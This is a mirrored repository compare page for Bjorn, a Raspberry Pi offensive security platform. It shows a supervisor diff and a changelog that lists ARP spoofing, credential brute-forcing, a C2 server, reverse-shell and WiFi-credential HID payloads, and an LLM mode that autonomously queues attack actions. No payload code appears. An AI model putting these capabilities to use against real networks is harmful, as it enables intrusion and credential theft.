Mirror of https://github.com/infinition/Bjorn.git (synced 2026-05-02 09:21:24 +00:00)

Compare commits: aac77a3e76...ai (5 commits: b541ec1f61, b0584a1a8e, 3fa4d5742a, df83cd2e92, b759ab6d4b)

Bjorn.py (53 lines changed)
```diff
@@ -1,7 +1,4 @@
-# Bjorn.py
-# Main entry point and supervisor for the Bjorn project
-# Manages lifecycle of threads, health monitoring, and crash protection.
-# OPTIMIZED FOR PI ZERO 2: Low CPU overhead, aggressive RAM management.
+"""Bjorn.py - Main supervisor: thread lifecycle, health monitoring, and crash protection."""
 
 import logging
 import os
@@ -305,7 +302,7 @@ class Bjorn:
         # Keep MANUAL sticky so supervisor does not auto-restart orchestration,
         # but only if the current mode isn't already handling it.
         # - MANUAL/BIFROST: already non-AUTO, no need to change
-        # - AUTO: let it be — orchestrator will restart naturally (e.g. after Bifrost auto-disable)
+        # - AUTO: let it be - orchestrator will restart naturally (e.g. after Bifrost auto-disable)
         try:
             current = self.shared_data.operation_mode
             if current == "AI":
@@ -471,6 +468,14 @@ def handle_exit(
     except Exception:
         pass
 
+    # 2e. Stop Plugin Manager
+    try:
+        mgr = getattr(shared_data, 'plugin_manager', None)
+        if mgr and hasattr(mgr, 'stop_all'):
+            mgr.stop_all()
+    except Exception:
+        pass
+
     # 3. Stop Web Server
     try:
         if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
@@ -547,7 +552,7 @@ if __name__ == "__main__":
     health_thread = HealthMonitor(shared_data, interval_s=health_interval)
     health_thread.start()
 
-    # Sentinel watchdog — start if enabled in config
+    # Sentinel watchdog - start if enabled in config
     try:
         from sentinel import SentinelEngine
         sentinel_engine = SentinelEngine(shared_data)
@@ -560,7 +565,7 @@ if __name__ == "__main__":
     except Exception as e:
         logger.warning("Sentinel init skipped: %s", e)
 
-    # Bifrost engine — start if enabled in config
+    # Bifrost engine - start if enabled in config
     try:
         from bifrost import BifrostEngine
         bifrost_engine = BifrostEngine(shared_data)
@@ -573,7 +578,7 @@ if __name__ == "__main__":
     except Exception as e:
         logger.warning("Bifrost init skipped: %s", e)
 
-    # Loki engine — start if enabled in config
+    # Loki engine - start if enabled in config
     try:
         from loki import LokiEngine
         loki_engine = LokiEngine(shared_data)
@@ -586,6 +591,36 @@ if __name__ == "__main__":
     except Exception as e:
         logger.warning("Loki init skipped: %s", e)
 
+    # LLM Bridge - warm up singleton (starts LaRuche mDNS discovery if enabled)
+    try:
+        from llm_bridge import LLMBridge
+        LLMBridge()  # Initialise singleton, kicks off background discovery
+        logger.info("LLM Bridge initialised")
+    except Exception as e:
+        logger.warning("LLM Bridge init skipped: %s", e)
+
+    # MCP Server - start if enabled in config
+    try:
+        import mcp_server
+        if shared_data.config.get("mcp_enabled", False):
+            mcp_server.start()
+            logger.info("MCP server started")
+        else:
+            logger.info("MCP server loaded (disabled - enable via Settings)")
+    except Exception as e:
+        logger.warning("MCP server init skipped: %s", e)
+
+    # Plugin Manager - discover and load enabled plugins
+    try:
+        from plugin_manager import PluginManager
+        plugin_manager = PluginManager(shared_data)
+        shared_data.plugin_manager = plugin_manager
+        plugin_manager.load_all()
+        plugin_manager.install_db_hooks()
+        logger.info(f"Plugin manager started ({len(plugin_manager._instances)} plugins loaded)")
+    except Exception as e:
+        logger.warning("Plugin manager init skipped: %s", e)
+
     # Signal Handlers
     exit_handler = lambda s, f: handle_exit(
         s,
@@ -689,6 +724,6 @@ if __name__ == "__main__":
                 runtime_state_thread,
                 False,
             )
-        except:
+        except Exception:
             pass
         sys.exit(1)
```
CHANGELOG.md (new file, 490 lines)
# BJORN — Changelog

> **From Viking Raider to Cyber Warlord.**
> This release represents a complete transformation of Bjorn — from a ~8,200-line Python prototype into a **~58,000-line Python + ~42,000-line frontend** autonomous cybersecurity platform with AI orchestration, WiFi recon, HID attacks, network watchdog, C2 infrastructure, and a full Single-Page Application dashboard.

---

## [2.1.0] — 2026-03-19

### Codebase Cleanup
- All Python file headers standardized to `"""filename.py - Description."""` format (~120 files)
- All French comments, docstrings, log/print strings, and error messages translated to English
- Removed redundant/obvious comments; trimmed verbose 10-20 line header essays to 1-3 lines
- Fixed encoding artifacts (garbled UTF-8 box-drawing chars in CSS)
- Fixed `# webutils/` path typos in 3 web_utils files
- Replaced LLM-style em dashes with plain hyphens across all .py files

### Custom Scripts System
- **Custom scripts directory** (`actions/custom/`) for user-uploaded scripts, ignored by the orchestrator
- **Two script formats supported**: Bjorn-format (class + `execute()` + `shared_data`) and free Python scripts (plain `argparse`)
- **Auto-detection** via AST parsing: scripts with a `b_class` var use action_runner, others run as raw subprocess
- **`b_args` support** for both formats: drives web UI controls (text, number, select, checkbox, slider) — see the sketch below
- **Upload/delete** via web UI with metadata extraction (no code exec during upload)
- **Auto-registration**: scripts dropped in `actions/custom/` via SSH are detected on the next API call
- Two example templates: `example_bjorn_action.py` and `example_free_script.py`
- Custom scripts appear in the console-sse manual mode dropdown under an `<optgroup>`

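A minimal sketch of what a Bjorn-format custom script could look like, assembled from the conventions above (`b_class`, `b_args`, an `execute()` method receiving `shared_data`). The file name, argument names, and the `execute()` signature are illustrative assumptions, not the exact template shipped in `actions/custom/`:

```python
# actions/custom/port_probe.py - hypothetical example of the Bjorn format.
# The b_* constants are read via AST parsing, so the web UI can build its
# controls without ever importing or executing this file.
import socket

b_class = "PortProbe"   # presence of b_class routes execution through action_runner
b_args = [
    {"name": "port", "type": "number", "default": 80, "label": "Port to probe"},
    {"name": "timeout", "type": "slider", "min": 1, "max": 10, "default": 3},
]

class PortProbe:
    def __init__(self, shared_data):
        self.shared_data = shared_data        # bootstrapped by action_runner

    def execute(self, ip, port):              # signature assumed for illustration
        # --key value CLI args arrive as attributes on shared_data
        probe_port = int(getattr(self.shared_data, "port", 80))
        timeout = float(getattr(self.shared_data, "timeout", 3))
        try:
            with socket.create_connection((ip, probe_port), timeout=timeout):
                return "success"
        except OSError:
            return "failed"
```
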
### Action Runner
- **`action_runner.py`** - Generic subprocess wrapper that bootstraps `shared_data` for manual action execution
- Supports `--ip`, `--port`, `--mac` plus arbitrary `--key value` args injected as `shared_data` attributes (see the sketch below)
- SIGTERM handler for graceful stop from the web UI
- MAC auto-resolution from the DB if not provided
- Handles both `execute()` and `scan()` (global actions like NetworkScanner)

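The "arbitrary `--key value` injection" idea can be pictured with a few lines of `argparse`; this is a sketch of the mechanism, not the literal `action_runner.py` code, and `bootstrap_shared_data()` is a hypothetical stand-in for the real bootstrap step:

```python
# Sketch: known flags parsed normally, everything else folded onto shared_data.
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("--ip")
parser.add_argument("--port")
parser.add_argument("--mac")
known, extra = parser.parse_known_args()

shared_data = bootstrap_shared_data()          # hypothetical helper
for key, value in zip(extra[0::2], extra[1::2]):
    # "--retries 5" becomes shared_data.retries = "5", readable via getattr()
    setattr(shared_data, key.lstrip("-"), value)
```
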
### Script Scheduler & Conditional Triggers
- **`script_scheduler.py`** - Lightweight 30s-tick background daemon for automated script execution
- **Recurring schedules**: run every N seconds (min 30s), persistent across reboots
- **One-shot schedules**: fire at a specific datetime, auto-disable afterwards
- **Conditional triggers**: fire scripts when DB conditions are met (AND/OR block logic; see the sketch below)
- **8 condition types**: `action_result`, `hosts_with_port`, `hosts_alive`, `cred_found`, `has_vuln`, `db_count`, `time_after`, `time_before`
- **Orchestrator hook**: triggers evaluated immediately when actions complete (not just on the 30s tick)
- **Concurrency limited** to 4 simultaneous scheduled scripts (Pi Zero friendly)
- **Condition builder** (`web/js/core/condition-builder.js`) - Visual nested AND/OR block editor
- Scheduler page extended with 3 tabs: Queue (existing kanban), Schedules, Triggers
- Full CRUD UI for schedules and triggers with inline edit, toggle, delete, auto-refresh
- "Test" button for dry-run condition evaluation

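The nested AND/OR block logic reduces to a small recursive walk; this sketch assumes a condition schema (`op`/`items` blocks, `type`/`value` leaves compared against DB-derived counts) that may differ from the real one in `script_scheduler.py`:

```python
# Recursive evaluation of nested AND/OR condition blocks (illustrative).
def evaluate(node, db_counts):
    if "op" in node:  # nested block: combine children with and/or
        results = (evaluate(child, db_counts) for child in node["items"])
        return all(results) if node["op"] == "and" else any(results)
    # leaf condition: compare a live DB count against a threshold
    return db_counts.get(node["type"], 0) >= node["value"]

trigger = {"op": "and", "items": [
    {"type": "hosts_alive", "value": 3},
    {"op": "or", "items": [
        {"type": "cred_found", "value": 1},
        {"type": "hosts_with_port", "value": 1},
    ]},
]}
print(evaluate(trigger, {"hosts_alive": 4, "cred_found": 0, "hosts_with_port": 2}))  # True
```
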
### Package Manager
- **pip package management** for custom script dependencies
- **SSE streaming** of install progress (`pip install --break-system-packages`)
- Packages tracked in the DB (`custom_packages` table) - only recorded after a successful install
- Uninstall with DB cleanup
- Package name validation (regex whitelist, no shell injection; see the sketch below)
- New "Packages" tab in the Actions page sidebar

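Regex-whitelist validation before shelling out might look like the following; the exact pattern Bjorn uses is an assumption, but the design point stands: an argument list (never `shell=True`) plus a strict name check leaves no room for shell injection:

```python
# Whitelist-style validation of pip package names (pattern is illustrative).
import re
import subprocess

_PKG_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*(\[[A-Za-z0-9,._-]+\])?$")

def install(package: str) -> None:
    if not _PKG_RE.fullmatch(package):
        raise ValueError(f"invalid package name: {package!r}")
    # argument list, not a shell string: metacharacters are inert here
    subprocess.run(
        ["pip", "install", "--break-system-packages", package],
        check=True,
    )
```
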
### New Database Modules
- `db_utils/schedules.py` - Schedule and trigger persistence (CRUD, due queries, cooldown checks)
- `db_utils/packages.py` - Custom package tracking

### New Web Endpoints
- `/api/schedules/*` (list, create, update, delete, toggle) - 5 endpoints
- `/api/triggers/*` (list, create, update, delete, toggle, test) - 6 endpoints
- `/api/packages/*` (list, install SSE, uninstall) - 3 endpoints
- `/upload_custom_script`, `/delete_custom_script` - Custom script management

### Resource & Memory Fixes
- Script output buffer capped at 2000 lines (was unbounded)
- Finished scripts dict auto-pruned (max 20 historical entries)
- AST parse results cached by file mtime (no re-parsing on every API call)
- Module imports replaced with AST extraction in `list_scripts()` (no more `sys.modules` pollution)
- Custom scripts filesystem scan throttled to once per 30s
- Scheduler daemon: event queue capped at 100, subprocess cleanup with `wait()` + `stdout.close()`
- Package install: graceful terminate -> wait -> kill cascade with FD cleanup

### Multilingual Comments Import
- `comment.py` `_ensure_comments_loaded()` now imports all `comments.*.json` files on every startup
- Drop `comments.fr.json`, `comments.de.json`, etc. next to `comments.en.json` for automatic multi-language support (see the sketch below)
- Existing comments untouched via `INSERT OR IGNORE` (unique index dedup)

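The dedup-on-import behaviour can be pictured with plain `sqlite3`; the table and column names below are assumptions, but the mechanism is the one described: a unique index plus `INSERT OR IGNORE` makes repeated startups no-ops for already-imported comments:

```python
# Illustrative import of comments.*.json files with INSERT OR IGNORE dedup.
import glob, json, sqlite3

conn = sqlite3.connect("bjorn.db")
for path in glob.glob("comments.*.json"):
    lang = path.split(".")[-2]                 # comments.fr.json -> "fr"
    with open(path, encoding="utf-8") as fh:
        for entry in json.load(fh):            # assumed: a list of dicts
            conn.execute(
                # unique index on (lang, status, text) makes re-imports no-ops
                "INSERT OR IGNORE INTO comments (lang, status, text) VALUES (?, ?, ?)",
                (lang, entry["status"], entry["text"]),
            )
conn.commit()
```
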
---

## [2.0.0] — 2025/2026 Major Release

### TL;DR — What's New

| Area | v1 (alpha 2) | v2 (this release) |
|------|-------------|-------------------|
| Python codebase | ~8,200 lines | **~58,000 lines** (7x) |
| Web frontend | ~2,100 lines (6 static HTML pages) | **~42,000 lines** (25-page SPA) |
| Action modules | 17 | **32** |
| Database | Monolithic SQLite helper | **Modular facade** (18 specialized modules) |
| AI/ML | Basic heuristic scoring | **Full RL engine** + LLM orchestrator + MCP server |
| Web UI | Static multi-page HTML | **Hash-routed SPA** with lazy-loading, theming, i18n |
| Languages | English only | **7 languages** (EN, FR, ES, DE, IT, RU, ZH) |
| WiFi recon | None | **Bifrost engine** (Pwnagotchi-compatible) |
| HID attacks | None | **Loki module** (USB Rubber Ducky-style) |
| Network watchdog | None | **Sentinel engine** (9 detection modules) |
| C2 server | None | **ZombieLand** (encrypted C2 with agent management) |
| LLM integration | None | **LLM Bridge** + MCP Server + Autonomous Orchestrator |
| Display | Basic 2.13" e-paper | **Multi-size EPD** + web-based layout editor |

---

### New Major Features

#### AI & LLM Integration — Bjorn Gets a Brain

- **LLM Bridge** (`llm_bridge.py`) — Singleton, thread-safe LLM backend with automatic cascade:
  1. LaRuche swarm node (LAND protocol / mDNS auto-discovery)
  2. Local Ollama instance
  3. External API (Anthropic / OpenAI / OpenRouter)
  4. Graceful fallback to templates
- **Agentic tool-calling loop** — Up to 6-turn tool-use cycles with the Anthropic API, enabling the LLM to query live network data and queue actions autonomously
- **MCP Server** (`mcp_server.py`) — Model Context Protocol server exposing 7 Bjorn tools (`get_hosts`, `get_vulnerabilities`, `get_credentials`, `get_action_history`, `get_status`, `run_action`, `query_db`), compatible with Claude Desktop and any MCP client
- **LLM Orchestrator** (`llm_orchestrator.py`) — Three operating modes:
  - `none` — LLM disabled (default, zero overhead)
  - `advisor` — LLM suggests one action per cycle (priority 85)
  - `autonomous` — Own daemon thread, full tool-calling loop, LLM becomes sole master of the action queue
- **Smart fingerprint skip** — Autonomous mode only calls the LLM when network state actually changes (new hosts, vulns, or credentials), saving API tokens
- **LAND Protocol** (`land_protocol.py`) — Native Python client for Local AI Network Discovery, auto-detects LaRuche inference nodes on LAN via mDNS
- **LLM-powered EPD comments** — E-paper display comments optionally generated by LLM with Norse personality, seamless fallback to database templates
- **Web chat interface** — Terminal-style chat with the LLM, tool-calling support, orchestrator reasoning log viewer
- **LLM configuration page** — Full web UI for all LLM/MCP settings, connection testing, per-tool access control
- **45+ new configuration parameters** for LLM bridge, MCP server, and orchestrator

#### Bifrost — WiFi Reconnaissance Engine

- **Pwnagotchi-compatible** WiFi recon daemon running alongside all Bjorn modes
- **BettercapClient** — Full HTTP API client for bettercap (session control, WiFi module management, handshake capture)
- **BifrostAgent** — Drives channel hopping, AP tracking, client deauth, handshake collection
- **BifrostAutomata** — State machine (MANUAL, AUTOMATIC, BORED, SAD, EXCITED, LONELY) controlling recon aggressiveness
- **BifrostEpoch** — Tracks WiFi recon epochs with reward calculation
- **BifrostVoice** — Personality/mood system for EPD display messages
- **Plugin system** — Extensible event-driven plugin architecture
- **Dedicated web page** (`bifrost.js`) for real-time WiFi recon monitoring
- **Database module** (`db_utils/bifrost.py`) for persistent handshake and AP storage
- **Monitor mode management** — Automatic WiFi interface setup/teardown scripts

#### Loki — USB HID Attack Framework

- **USB Rubber Ducky-style HID injection** via Raspberry Pi USB gadget mode
- **HID Controller** (`loki/hid_controller.py`) — Low-level USB HID keyboard/mouse report writer to `/dev/hidg0`/`/dev/hidg1`
- **HIDScript engine** (`loki/hidscript.py`) — JavaScript-based payload scripting language
- **Multi-language keyboard layouts** — US, FR, DE, ES, IT, RU, UK, ZH with JSON layout definitions and auto-generation tool
- **Pre-built payloads** — Hello World, Reverse Shell (Linux), Rickroll, WiFi credential exfiltration (Windows)
- **Job queue** (`loki/jobs.py`) — Managed execution of HID payloads with status tracking
- **Loki Deceiver action** (`actions/loki_deceiver.py`) — Rogue access point creation for WiFi authentication capture and MITM
- **Dedicated web page** (`loki.js`) for payload management and execution
- **Database module** (`db_utils/loki.py`) for job persistence

#### Sentinel — Network Watchdog Engine

- **9 detection modules** running as a lightweight background daemon:
  - `new_device` — Never-seen MAC appears on the network
  - `device_join` — Known device comes back online
  - `device_leave` — Known device goes offline
  - `arp_spoof` — Same IP claimed by multiple MACs (ARP cache conflict; see the sketch after this list)
  - `port_change` — Host ports changed since the last snapshot
  - `service_change` — New service detected on a known host
  - `rogue_dhcp` — Multiple DHCP servers detected
  - `dns_anomaly` — DNS response pointing to an unexpected IP
  - `mac_flood` — Sudden burst of new MACs (possible MAC flooding attack)
- **Zero extra network traffic** — All checks read from the existing Bjorn DB
- **Configurable severity levels** (info, warning, critical)
- **Dedicated web page** (`sentinel.js`) for alert browsing and rule management
- **Database module** (`db_utils/sentinel.py`) for alert persistence

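Because every check reads from the existing DB, a module like `arp_spoof` reduces to a single query; a minimal sketch, assuming a `hosts` table with `ip`, `mac`, and `alive` columns (the real schema may differ):

```python
# arp_spoof detection idea: one IP claimed by more than one MAC in the
# hosts table is an ARP cache conflict worth alerting on (illustrative).
import sqlite3

def check_arp_spoof(conn: sqlite3.Connection):
    rows = conn.execute(
        "SELECT ip, COUNT(DISTINCT mac) AS macs FROM hosts "
        "WHERE alive = 1 GROUP BY ip HAVING macs > 1"
    ).fetchall()
    # no packets sent: the scan data Bjorn already collected is enough
    return [{"module": "arp_spoof", "severity": "critical", "ip": ip}
            for ip, _macs in rows]
```
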
#### ZombieLand — Command & Control Infrastructure

- **C2 Manager** (`c2_manager.py`) — Professional C2 server with:
  - Encrypted agent communication (Fernet)
  - SSH-based agent registration via Paramiko
  - Agent heartbeat monitoring and health tracking
  - Job dispatch and result collection
  - UUID-based agent identification
- **Dedicated web page** (`zombieland.js`) with SSE-powered real-time agent monitoring
- **Database module** (`db_utils/agents.py`) for agent and job persistence
- **Marked as experimental** with appropriate UI warnings

---

### New Action Modules (18 New Actions)

| Action | Module | Description |
|--------|--------|-------------|
| **ARP Spoofer** | `arp_spoofer.py` | Bidirectional ARP cache poisoning for MITM positioning with automatic gateway detection and clean ARP table restoration |
| **Berserker Force** | `berserker_force.py` | Service resilience stress-testing — baseline measurement, controlled TCP/SYN/HTTP load testing, performance degradation quantification |
| **DNS Pillager** | `dns_pillager.py` | Comprehensive DNS reconnaissance — reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), zone transfer attempts |
| **Freya Harvest** | `freya_harvest.py` | Network-wide data harvesting and consolidation action |
| **Heimdall Guard** | `heimdall_guard.py` | Advanced stealth module for traffic manipulation and IDS/IPS evasion |
| **Loki Deceiver** | `loki_deceiver.py` | Rogue access point creation for WiFi authentication capture and MITM attacks |
| **Odin Eye** | `odin_eye.py` | Passive network analyzer for credential and data pattern hunting |
| **Rune Cracker** | `rune_cracker.py` | Advanced hash/credential cracking module |
| **Thor Hammer** | `thor_hammer.py` | Lightweight service fingerprinting via TCP connect + banner grab (Pi Zero friendly, no nmap dependency) |
| **Valkyrie Scout** | `valkyrie_scout.py` | Web surface reconnaissance — probes common paths, extracts auth types, login forms, missing security headers, error/debug strings |
| **Yggdrasil Mapper** | `yggdrasil_mapper.py` | Network topology mapper via traceroute with service enrichment from DB and merged JSON topology graph |
| **Web Enumeration** | `web_enum.py` | Web service enumeration and directory discovery |
| **Web Login Profiler** | `web_login_profiler.py` | Web login form detection and profiling |
| **Web Surface Mapper** | `web_surface_mapper.py` | Web application surface mapping and endpoint discovery |
| **WPAsec Potfiles** | `wpasec_potfiles.py` | WPA-sec.stanev.org potfile integration for WiFi password recovery |
| **Presence Join** | `presence_join.py` | Event-triggered action when a host joins the network (priority 90) |
| **Presence Leave** | `presence_left.py` | Event-triggered action when a host leaves the network (priority 90) |
| **Demo Action** | `demo_action.py` | Template/demonstration action for community developers |

### Improved Action Modules

- All bruteforce actions (SSH, FTP, SMB, SQL, Telnet) **rewritten** around a shared `bruteforce_common.py` module providing:
  - A `ProgressTracker` class for unified EPD progress reporting
  - Standardized credential iteration and result handling
  - Configurable rate limiting and timeout management
- **Scanning action** (`scanning.py`) improved with better network discovery and host tracking
- **Nmap Vulnerability Scanner** refined with better CVE parsing and result persistence
- All steal/exfiltrate modules updated for compatibility with the new database schema

### Removed Actions

| Action | Reason |
|--------|--------|
| `rdp_connector.py` / `steal_files_rdp.py` | Replaced by more capable modules |
| `log_standalone.py` / `log_standalone2.py` | Consolidated into the proper logging system |
| `ftp_connector.py`, `smb_connector.py`, etc. | Connector pattern replaced by dedicated bruteforce modules |

---

### Web Interface — Complete Rewrite

#### Architecture Revolution

- **Static multi-page HTML** (6 pages) replaced by a **hash-routed Single Page Application** with 25 lazy-loaded page modules
- **SPA Router** (`web/js/core/router.js`) — Hash-based routing with guaranteed `unmount()` cleanup before page transitions
- **ResourceTracker** (`web/js/core/resource-tracker.js`) — Automatic tracking and cleanup of intervals, timeouts, event listeners, and AbortControllers per page — **zero memory leaks**
- **Single `index.html`** entry point replaces 6 separate HTML files
- **Modular CSS** — Global stylesheet + per-page CSS files (`web/css/pages/*.css`)

#### New Web Pages (19 New Pages)

| Page | Module | Description |
|------|--------|-------------|
| **Dashboard** | `dashboard.js` | Real-time system stats, resource monitoring, uptime tracking |
| **Actions** | `actions.js` | Action browser with enable/disable toggles and configuration |
| **Actions Studio** | `actions-studio.js` | Visual action pipeline editor with drag-and-drop canvas |
| **Attacks** | `attacks.js` | Attack configuration with image upload and EPD layout editor tab |
| **Backup** | `backup.js` | Database backup/restore management |
| **Bifrost** | `bifrost.js` | WiFi recon monitoring dashboard |
| **Database** | `database.js` | Direct database browser and query tool |
| **Files** | `files.js` | File manager with upload, drag-drop, rename, delete |
| **LLM Chat** | `llm-chat.js` | Terminal-style LLM chat with tool-calling and orch log viewer |
| **LLM Config** | `llm-config.js` | Full LLM/MCP configuration panel |
| **Loki** | `loki.js` | HID attack payload management and execution |
| **RL Dashboard** | `rl-dashboard.js` | Reinforcement Learning metrics and model performance visualization |
| **Scheduler** | `scheduler.js` | Action scheduler configuration and monitoring |
| **Sentinel** | `sentinel.js` | Network watchdog alerts and rule management |
| **Vulnerabilities** | `vulnerabilities.js` | CVE browser with modal details and feed sync |
| **Web Enum** | `web-enum.js` | Web enumeration results browser with status filters |
| **ZombieLand** | `zombieland.js` | C2 agent management dashboard (experimental) |
| **Bjorn Debug** | `bjorn-debug.js` | System debug information and diagnostics |
| **Scripts** | (via scheduler) | Custom script upload and execution |

#### Improved Existing Pages

- **Network** (`network.js`) — D3 force-directed graph completely rewritten with proper cleanup on unmount, lazy D3 loading, search debounce, simulation stop
- **Credentials** (`credentials.js`) — AbortController tracking, toast timer cleanup, proper state reset
- **Loot** (`loot.js`) — Search timer cleanup, ResourceTracker integration
- **NetKB** (`netkb.js`) — View mode persistence, filter tracking, pagination integration
- **Bjorn/EPD** (`bjorn.js`) — Image refresh tracking, zoom controls, null EPD state handling

#### Internationalization (i18n)

- **7 supported languages**: English, French, Spanish, German, Italian, Russian, Chinese
- **i18n module** (`web/js/core/i18n.js`) with JSON translation files, `t()` helper function, and `data-i18n` attribute auto-translation
- **Fallback chain**: Current language -> English -> developer warning
- **Language selector** in UI with `localStorage` persistence

#### Theming Engine

- **Theme module** (`web/js/core/theme.js`) — CSS variable-based theming system
- **Preset themes** including default "Nordic Acid" (dark green/cyan)
- **User custom themes** with color picker + raw CSS editing
- **Icon pack switching** via icon registry
- **Theme import/export** as JSON
- **Live preview** — changes applied instantly without page reload
- **`localStorage` persistence** across sessions

#### Other Frontend Features

- **Console SSE** (`web/js/core/console-sse.js`) — Server-Sent Events for real-time log streaming with reconnect logic
- **Quick Panel** (`web/js/core/quickpanel.js`) — Fast-access control panel
- **Sidebar Layout** (`web/js/core/sidebar-layout.js`) — Collapsible sidebar navigation
- **Settings Config** (`web/js/core/settings-config.js`) — Dynamic form generation from config schema with chip editor
- **EPD Layout Editor** (`web/js/core/epd-editor.js`) — SVG drag-and-drop editor for e-paper display layouts with grid/snap, zoom (50-600%), undo stack, element properties panel
- **D3.js v7** bundled for network topology visualization
- **PWA Manifest** updated for installable web app experience

---

### Core Engine Improvements

#### Database — Modular Facade Architecture

- **Complete database rewrite** — Monolithic SQLite helper replaced by a `BjornDatabase` facade delegating to **18 specialized modules** in `db_utils/`:
  - `base.py` — Connection management, thread-safe connection pool
  - `config.py` — Configuration CRUD operations
  - `hosts.py` — Host discovery and tracking
  - `actions.py` — Action metadata and history
  - `queue.py` — Action queue with priority system and circuit breaker
  - `vulnerabilities.py` — CVE vulnerability storage
  - `software.py` — Software inventory
  - `credentials.py` — Credential storage
  - `services.py` — Service/port tracking
  - `scripts.py` — Custom script management
  - `stats.py` — Statistics and metrics
  - `backups.py` — Database backup/restore
  - `comments.py` — EPD comment templates
  - `agents.py` — C2 agent management
  - `studio.py` — Actions Studio pipeline data
  - `webenum.py` — Web enumeration results
  - `sentinel.py` — Sentinel alert storage
  - `bifrost.py` — WiFi recon data
  - `loki.py` — HID attack job storage
- **Full backward compatibility** maintained via `__getattr__` delegation (see the sketch below)

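The backward-compatible delegation can be as small as a single `__getattr__`; a minimal sketch of the idea (the real facade wires up the concrete `db_utils` modules listed above):

```python
# Facade sketch: any attribute not found on BjornDatabase itself is looked
# up on the specialized modules, so old call sites like db.get_hosts()
# keep working unchanged (illustrative, not the literal implementation).
class BjornDatabase:
    def __init__(self, *modules):
        self._modules = modules  # e.g. HostsDB(), QueueDB(), CredentialsDB()

    def __getattr__(self, name):
        # only called when normal attribute lookup fails on the facade
        for module in self._modules:
            if hasattr(module, name):
                return getattr(module, name)
        raise AttributeError(name)
```
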
#### Orchestrator — Smarter, More Resilient

- **Action Scheduler** (`action_scheduler.py`) — Complete rewrite with:
  - Trigger evaluation system (`on_host_alive`, `on_port_change`, `on_web_service`, `on_join`, `on_leave`, `on_start`, `on_success:*`)
  - Requirements checking with dependency resolution
  - Cooldown and rate limiting per action
  - Priority queue processing
  - Circuit breaker integration
  - LLM autonomous mode skip option
- **Per-action circuit breaker** — 3-state machine (closed -> open -> half-open) with exponential backoff, prevents repeated failures from wasting resources (see the sketch after this list)
- **Global concurrency limiter** — DB-backed running action count check, configurable `semaphore_slots`
- **Manual mode with active scanning** — Background scan timer keeps network discovery running even in manual mode
- **Runtime State Updater** (`runtime_state_updater.py`) — Dedicated background thread keeping display-facing data fresh, decoupled from the render loop

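A minimal sketch of the 3-state breaker with exponential backoff, assuming a failure threshold of 3 and a base cooldown in seconds (Bjorn's actual thresholds are configurable, per the Configuration section below):

```python
# Circuit breaker sketch: closed -> open after N failures, half-open after
# an exponentially growing cooldown, closed again on success (illustrative).
import time

class CircuitBreaker:
    def __init__(self, threshold=3, base_cooldown=60.0):
        self.failures, self.threshold = 0, threshold
        self.base_cooldown, self.opened_at = base_cooldown, None

    def allow(self) -> bool:
        if self.opened_at is None:
            return True                       # closed: run freely
        backoff = self.base_cooldown * (2 ** (self.failures - self.threshold))
        return time.time() - self.opened_at >= backoff   # half-open probe

    def record(self, success: bool) -> None:
        if success:
            self.failures, self.opened_at = 0, None      # close again
        else:
            self.failures += 1
            if self.failures >= self.threshold:
                self.opened_at = time.time()             # open the circuit
```
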
#### AI/ML Engine — From Heuristic to Reinforcement Learning

- **AI Engine** (`ai_engine.py`) — Full reinforcement learning decision engine:
  - Feature-based action scoring
  - Model versioning with up to 3 versions on disk
  - Auto-rollback if the average reward drops after 50 decisions
  - Cold-start bootstrap with persistent per-(action, port_profile) running averages (see the sketch after this list)
  - Blended heuristic/bootstrap scoring during the warm-up phase
- **Feature Logger** (`feature_logger.py`) — Structured feature logging for ML training with variance-based feature selection
- **Data Consolidator** (`data_consolidator.py`) — Aggregates logged features into training-ready datasets exportable for TensorFlow/PyTorch
- **Continuous reward shaping** — Novelty bonus, repeat penalty, diminishing returns, partial credit for long-running failed actions
- **AI utility modules** (`ai_utils.py`) for shared ML helper functions

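The cold-start bootstrap amounts to a running average per (action, port_profile) pair, blended with the heuristic score while samples are scarce; a sketch of the idea (the blend weight schedule and the 50-sample horizon are assumptions):

```python
# Blended heuristic/bootstrap scoring during warm-up (illustrative).
averages = {}  # (action, port_profile) -> (mean_reward, sample_count)

def score(action, port_profile, heuristic):
    mean, n = averages.get((action, port_profile), (0.0, 0))
    alpha = min(n / 50, 1.0)          # trust the learned average more as n grows
    return alpha * mean + (1 - alpha) * heuristic

def record(action, port_profile, reward):
    mean, n = averages.get((action, port_profile), (0.0, 0))
    averages[(action, port_profile)] = ((mean * n + reward) / (n + 1), n + 1)
```
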
#### Display — Multi-Size EPD Support

- **Display Layout Engine** (`display_layout.py`) — JSON-based element positioning system:
  - Built-in layouts for 2.13" and 2.7" Waveshare e-paper displays
  - 20+ positionable UI elements (icons, text, bars, status indicators)
  - Custom layout override via `resources/layouts/{epd_type}.json`
  - `px()`/`py()` scaling preserved for resolution independence
- **EPD Manager** (`epd_manager.py`) — Abstraction layer over Waveshare EPD hardware
- **Web-based EPD Layout Editor** — SVG drag-and-drop canvas with:
  - Corner resize handles
  - Color/NB/BN display mode preview
  - Grid/snap, zoom (50-600%), toggleable element labels
  - Add/delete elements, import/export layout JSON
  - 50-deep undo stack (Ctrl+Z)
  - Color-coded elements by type
  - Arrow key nudge, keyboard shortcuts
- **Display module** (`display.py`) grew from 390 to **1,130 lines** with a multi-layout rendering pipeline

#### Web Server — Massive Expansion

- **webapp.py** grew from 222 to **1,037 lines**
- **25 web utility modules** in `web_utils/` (was: 0):
  - `action_utils.py`, `attack_utils.py`, `backup_utils.py`, `bifrost_utils.py`
  - `bluetooth_utils.py`, `c2_utils.py`, `character_utils.py`, `comment_utils.py`
  - `db_utils.py`, `debug_utils.py`, `file_utils.py`, `image_utils.py`
  - `index_utils.py`, `llm_utils.py`, `loki_utils.py`, `netkb_utils.py`
  - `network_utils.py`, `orchestrator_utils.py`, `rl_utils.py`, `script_utils.py`
  - `sentinel_utils.py`, `studio_utils.py`, `system_utils.py`, `vuln_utils.py`
  - `webenum_utils.py`
- **Paginated API endpoints** for heavy data (`?page=N&per_page=M`)
- **RESTful API** covering all new features (LLM, MCP, Sentinel, Bifrost, Loki, C2, EPD editor, backups, etc.)

#### Configuration — Greatly Expanded

- **shared.py** grew from 685 to **1,502 lines** — more than doubled
- **New configuration sections**:
  - LLM Bridge (14 parameters)
  - MCP Server (4 parameters)
  - LLM Orchestrator (7 parameters)
  - AI/ML Engine (feature selection, model versioning, cold-start bootstrap)
  - Circuit breaker (threshold, cooldown)
